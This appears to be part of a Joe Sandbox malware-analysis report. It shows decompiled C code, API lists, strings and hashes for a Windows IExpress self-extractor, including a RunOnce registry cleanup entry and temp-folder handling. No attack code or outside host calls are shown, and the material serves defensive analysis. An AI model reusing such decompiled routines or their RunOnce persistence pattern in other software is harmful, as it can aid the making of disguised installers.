                                                                                                                                                                                                                                              						 *0x97a288(_v12);
                                                                                                                                                                                                                                              						 *_v20();
                                                                                                                                                                                                                                              						if(_t71 != _t71) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t66);
                                                                                                                                                                                                                                              					_t85 =  *0x9787a0; // 0x0
                                                                                                                                                                                                                                              					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					GetTempPathA(0x104, 0x9788c0);
                                                                                                                                                                                                                                              					_t61 = 0x9788c0;
                                                                                                                                                                                                                                              					_t4 =  &(_t61[1]); // 0x9788c1
                                                                                                                                                                                                                                              					_t65 = _t4;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t42 =  *_t61;
                                                                                                                                                                                                                                              						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                              					} while (_t42 != 0);
                                                                                                                                                                                                                                              					_t5 = _t61 - _t65 + 0x9788c0; // 0x12f1181
                                                                                                                                                                                                                                              					_t44 = CharPrevA(0x9788c0, _t5);
                                                                                                                                                                                                                                              					_v8 = _t44;
                                                                                                                                                                                                                                              					if( *_t44 == 0x5c &&  *(CharPrevA(0x9788c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                              						 *_v8 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                              0x00974234
                                                                                                                                                                                                                                              0x0097423c
                                                                                                                                                                                                                                              0x00974240
                                                                                                                                                                                                                                              0x009743b2
                                                                                                                                                                                                                                              0x009743b7
                                                                                                                                                                                                                                              0x009743c0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009743c5
                                                                                                                                                                                                                                              0x0097424c
                                                                                                                                                                                                                                              0x00974252
                                                                                                                                                                                                                                              0x00974257
                                                                                                                                                                                                                                              0x009743a4
                                                                                                                                                                                                                                              0x009743a5
                                                                                                                                                                                                                                              0x009743ab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009743ab
                                                                                                                                                                                                                                              0x00974263
                                                                                                                                                                                                                                              0x00974269
                                                                                                                                                                                                                                              0x0097426e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097427a
                                                                                                                                                                                                                                              0x00974280
                                                                                                                                                                                                                                              0x00974285
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097428d
                                                                                                                                                                                                                                              0x00974293
                                                                                                                                                                                                                                              0x009742e6
                                                                                                                                                                                                                                              0x009742e9
                                                                                                                                                                                                                                              0x009742ef
                                                                                                                                                                                                                                              0x009742f4
                                                                                                                                                                                                                                              0x009742f7
                                                                                                                                                                                                                                              0x00974300
                                                                                                                                                                                                                                              0x00974307
                                                                                                                                                                                                                                              0x0097430e
                                                                                                                                                                                                                                              0x00974315
                                                                                                                                                                                                                                              0x0097431c
                                                                                                                                                                                                                                              0x00974322
                                                                                                                                                                                                                                              0x00974326
                                                                                                                                                                                                                                              0x0097432d
                                                                                                                                                                                                                                              0x0097432d
                                                                                                                                                                                                                                              0x0097432f
                                                                                                                                                                                                                                              0x00974334
                                                                                                                                                                                                                                              0x00974343
                                                                                                                                                                                                                                              0x00974349
                                                                                                                                                                                                                                              0x0097434d
                                                                                                                                                                                                                                              0x00974354
                                                                                                                                                                                                                                              0x00974354
                                                                                                                                                                                                                                              0x0097435d
                                                                                                                                                                                                                                              0x0097436e
                                                                                                                                                                                                                                              0x0097436e
                                                                                                                                                                                                                                              0x0097437d
                                                                                                                                                                                                                                              0x00974383
                                                                                                                                                                                                                                              0x00974387
                                                                                                                                                                                                                                              0x0097438e
                                                                                                                                                                                                                                              0x0097438e
                                                                                                                                                                                                                                              0x00974387
                                                                                                                                                                                                                                              0x00974391
                                                                                                                                                                                                                                              0x00974399
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00974295
                                                                                                                                                                                                                                              0x0097429f
                                                                                                                                                                                                                                              0x009742a5
                                                                                                                                                                                                                                              0x009742aa
                                                                                                                                                                                                                                              0x009742aa
                                                                                                                                                                                                                                              0x009742ad
                                                                                                                                                                                                                                              0x009742ad
                                                                                                                                                                                                                                              0x009742af
                                                                                                                                                                                                                                              0x009742b0
                                                                                                                                                                                                                                              0x009742b6
                                                                                                                                                                                                                                              0x009742c2
                                                                                                                                                                                                                                              0x009742c8
                                                                                                                                                                                                                                              0x009742ce
                                                                                                                                                                                                                                              0x009742e4
                                                                                                                                                                                                                                              0x009742e4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009742ce

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00974236
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0097424C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00974263
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0097427A
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,009788C0,?,00000001), ref: 0097429F
                                                                                                                                                                                                                                              • CharPrevA.USER32(009788C0,012F1181,?,00000001), ref: 009742C2
                                                                                                                                                                                                                                              • CharPrevA.USER32(009788C0,00000000,?,00000001), ref: 009742D6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00974391
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 009743A5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                              • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                              • Opcode ID: 744428409c8e31bf1dbf3a817100a171e369cfb60cc1e69170e2aa505a1f2da1
                                                                                                                                                                                                                                              • Instruction ID: b3532e9bbc4ceb7d61c8cf30e526282ee028e4fe2b9bf3067821dd2afed8310b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 744428409c8e31bf1dbf3a817100a171e369cfb60cc1e69170e2aa505a1f2da1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18413873A44200AFE7119F74DC8DAAF7BB8EB85344F4484A9E92DA3252CB348C41D766
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00972773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v269;
                                                                                                                                                                                                                                              				CHAR* _v276;
                                                                                                                                                                                                                                              				int _v280;
                                                                                                                                                                                                                                              				void* _v284;
                                                                                                                                                                                                                                              				int _v288;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				int _t45;
                                                                                                                                                                                                                                              				int* _t50;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				CHAR* _t61;
                                                                                                                                                                                                                                              				char* _t62;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t52 = __ecx;
                                                                                                                                                                                                                                              				_t23 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                              				_t62 = _a4;
                                                                                                                                                                                                                                              				_t50 = 0;
                                                                                                                                                                                                                                              				_t61 = __ecx;
                                                                                                                                                                                                                                              				_v276 = _t62;
                                                                                                                                                                                                                                              				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                              				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t64 = _t62 + 1;
                                                                                                                                                                                                                                              					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                              					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					_t34 = _v269;
                                                                                                                                                                                                                                              					if(_t34 == 0x53) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 == 0x57) {
                                                                                                                                                                                                                                              							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(_t52);
                                                                                                                                                                                                                                              							_v288 = 0x104;
                                                                                                                                                                                                                                              							E00971781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                              							_t59 = 0x104;
                                                                                                                                                                                                                                              							E0097658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                              								L16:
                                                                                                                                                                                                                                              								_t59 = _t63;
                                                                                                                                                                                                                                              								E0097658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								if(RegQueryValueExA(_v284, 0x971140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                              									_t45 = _v280;
                                                                                                                                                                                                                                              									if(_t45 != 2) {
                                                                                                                                                                                                                                              										L9:
                                                                                                                                                                                                                                              										if(_t45 == 1) {
                                                                                                                                                                                                                                              											goto L10;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              											_t45 = _v280;
                                                                                                                                                                                                                                              											goto L9;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t59 = 0x104;
                                                                                                                                                                                                                                              											E00971680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                              											L10:
                                                                                                                                                                                                                                              											_t50 = 1;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								RegCloseKey(_v284);
                                                                                                                                                                                                                                              								L15:
                                                                                                                                                                                                                                              								if(_t50 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                              0x00972773
                                                                                                                                                                                                                                              0x0097277e
                                                                                                                                                                                                                                              0x00972785
                                                                                                                                                                                                                                              0x0097278a
                                                                                                                                                                                                                                              0x0097278d
                                                                                                                                                                                                                                              0x00972790
                                                                                                                                                                                                                                              0x00972792
                                                                                                                                                                                                                                              0x00972798
                                                                                                                                                                                                                                              0x0097279d
                                                                                                                                                                                                                                              0x009728b2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009727a3
                                                                                                                                                                                                                                              0x009727a3
                                                                                                                                                                                                                                              0x009727af
                                                                                                                                                                                                                                              0x009727c2
                                                                                                                                                                                                                                              0x009727c8
                                                                                                                                                                                                                                              0x009727cd
                                                                                                                                                                                                                                              0x009727d5
                                                                                                                                                                                                                                              0x009728b7
                                                                                                                                                                                                                                              0x009728b9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009727db
                                                                                                                                                                                                                                              0x009727dd
                                                                                                                                                                                                                                              0x009728aa
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009727e3
                                                                                                                                                                                                                                              0x009727e3
                                                                                                                                                                                                                                              0x009727ec
                                                                                                                                                                                                                                              0x009727f8
                                                                                                                                                                                                                                              0x00972803
                                                                                                                                                                                                                                              0x0097280b
                                                                                                                                                                                                                                              0x00972831
                                                                                                                                                                                                                                              0x009728c3
                                                                                                                                                                                                                                              0x009728c9
                                                                                                                                                                                                                                              0x009728cd
                                                                                                                                                                                                                                              0x00972837
                                                                                                                                                                                                                                              0x0097285a
                                                                                                                                                                                                                                              0x0097285c
                                                                                                                                                                                                                                              0x00972865
                                                                                                                                                                                                                                              0x00972892
                                                                                                                                                                                                                                              0x00972895
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972867
                                                                                                                                                                                                                                              0x00972878
                                                                                                                                                                                                                                              0x0097288c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097287a
                                                                                                                                                                                                                                              0x00972880
                                                                                                                                                                                                                                              0x00972885
                                                                                                                                                                                                                                              0x00972897
                                                                                                                                                                                                                                              0x00972899
                                                                                                                                                                                                                                              0x00972899
                                                                                                                                                                                                                                              0x00972878
                                                                                                                                                                                                                                              0x00972865
                                                                                                                                                                                                                                              0x009728a0
                                                                                                                                                                                                                                              0x009728bf
                                                                                                                                                                                                                                              0x009728c1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009728c1
                                                                                                                                                                                                                                              0x00972831
                                                                                                                                                                                                                                              0x009727dd
                                                                                                                                                                                                                                              0x009727d5
                                                                                                                                                                                                                                              0x009728e5

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharUpperA.USER32(694569F9,00000000,00000000,00000000), ref: 009727A8
                                                                                                                                                                                                                                              • CharNextA.USER32(0000054D), ref: 009727B5
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 009727BC
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972829
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00971140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972852
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00972870
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009728A0
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 009728AA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 009728B9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 009727E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                              • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                              • Opcode ID: 016747043a3c755a333ec930da2f0c1b4cc4624c49870cc0cbfc368572df4bcb
                                                                                                                                                                                                                                              • Instruction ID: b3b22ee7b48e79ff451dfb5c35cb250e20155748aac18febf68d12a7c517400e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 016747043a3c755a333ec930da2f0c1b4cc4624c49870cc0cbfc368572df4bcb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B41A572A18128AFDB249B64DC45AEE77BDEB95700F0084A9F58DD2100DB704EC5DFA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                                                                                                              			E00972267() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v836;
                                                                                                                                                                                                                                              				void* _v840;
                                                                                                                                                                                                                                              				int _v844;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t19 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				if( *0x978530 != 0) {
                                                                                                                                                                                                                                              					_push(_t49);
                                                                                                                                                                                                                                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                              						_push(_t38);
                                                                                                                                                                                                                                              						_v844 = 0x238;
                                                                                                                                                                                                                                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                              							_push(_t47);
                                                                                                                                                                                                                                              							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              								E0097658A( &_v268, 0x104, 0x971140);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                              							E0097171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                              							_t42 =  &_v836;
                                                                                                                                                                                                                                              							_t45 = _t42 + 1;
                                                                                                                                                                                                                                              							_pop(_t47);
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t33 =  *_t42;
                                                                                                                                                                                                                                              								_t42 = _t42 + 1;
                                                                                                                                                                                                                                              							} while (_t33 != 0);
                                                                                                                                                                                                                                              							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                              						_pop(_t38);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_pop(_t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x00972272
                                                                                                                                                                                                                                              0x00972277
                                                                                                                                                                                                                                              0x00972279
                                                                                                                                                                                                                                              0x00972283
                                                                                                                                                                                                                                              0x00972289
                                                                                                                                                                                                                                              0x009722ab
                                                                                                                                                                                                                                              0x009722b1
                                                                                                                                                                                                                                              0x009722c4
                                                                                                                                                                                                                                              0x009722e0
                                                                                                                                                                                                                                              0x009722e6
                                                                                                                                                                                                                                              0x009722f5
                                                                                                                                                                                                                                              0x0097230d
                                                                                                                                                                                                                                              0x0097231c
                                                                                                                                                                                                                                              0x0097231c
                                                                                                                                                                                                                                              0x00972321
                                                                                                                                                                                                                                              0x0097233a
                                                                                                                                                                                                                                              0x00972342
                                                                                                                                                                                                                                              0x00972348
                                                                                                                                                                                                                                              0x0097234b
                                                                                                                                                                                                                                              0x0097234c
                                                                                                                                                                                                                                              0x0097234c
                                                                                                                                                                                                                                              0x0097234e
                                                                                                                                                                                                                                              0x0097234f
                                                                                                                                                                                                                                              0x0097236e
                                                                                                                                                                                                                                              0x0097236e
                                                                                                                                                                                                                                              0x0097237a
                                                                                                                                                                                                                                              0x00972380
                                                                                                                                                                                                                                              0x00972380
                                                                                                                                                                                                                                              0x00972381
                                                                                                                                                                                                                                              0x00972381
                                                                                                                                                                                                                                              0x0097238f

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 009722A3
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 009722D8
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 009722F5
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00972305
                                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0097236E
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0097237A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • wextract_cleanup0, xrefs: 0097227C, 009722CD, 00972363
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00972321
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00972299
                                                                                                                                                                                                                                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0097232D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                              • API String ID: 3027380567-2036266374
                                                                                                                                                                                                                                              • Opcode ID: 239607ffddea1a09f450664c3ef46da21e956136d93d28f6a863e80736a0868c
                                                                                                                                                                                                                                              • Instruction ID: 1c6af2d50b4e22acaa2f708c3dcb5a71b0977029fa669a7baec53436483da930
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 239607ffddea1a09f450664c3ef46da21e956136d93d28f6a863e80736a0868c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7031D773A142186BDB219B60DC49FEF7B7CEF95704F0041E9B54DA6051EA70AF88CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                              			E00973100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              				struct HWND__* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					if( *0x978590 == 0) {
                                                                                                                                                                                                                                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                              						 *0x978590 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t8 - 1;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                                                              					EndDialog(_a4, ??);
                                                                                                                                                                                                                                              					L9:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                                                                              					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t33 = _a4;
                                                                                                                                                                                                                                              					E009743D0(_t33, _t16);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t33, 0x834,  *0x978d4c);
                                                                                                                                                                                                                                              					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                              					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                              					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                              					 *0x9788b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                              					SetWindowLongA(_t34, 0xfffffffc, E009730C0);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t15 != 1) {
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a12 != 6) {
                                                                                                                                                                                                                                              					if(_a12 != 7) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              0x00973108
                                                                                                                                                                                                                                              0x0097310b
                                                                                                                                                                                                                                              0x009731b7
                                                                                                                                                                                                                                              0x009731ca
                                                                                                                                                                                                                                              0x009731d0
                                                                                                                                                                                                                                              0x009731d0
                                                                                                                                                                                                                                              0x009731da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009731da
                                                                                                                                                                                                                                              0x00973111
                                                                                                                                                                                                                                              0x00973114
                                                                                                                                                                                                                                              0x00973136
                                                                                                                                                                                                                                              0x00973136
                                                                                                                                                                                                                                              0x00973138
                                                                                                                                                                                                                                              0x0097313b
                                                                                                                                                                                                                                              0x00973141
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973143
                                                                                                                                                                                                                                              0x00973116
                                                                                                                                                                                                                                              0x0097311b
                                                                                                                                                                                                                                              0x0097314b
                                                                                                                                                                                                                                              0x00973151
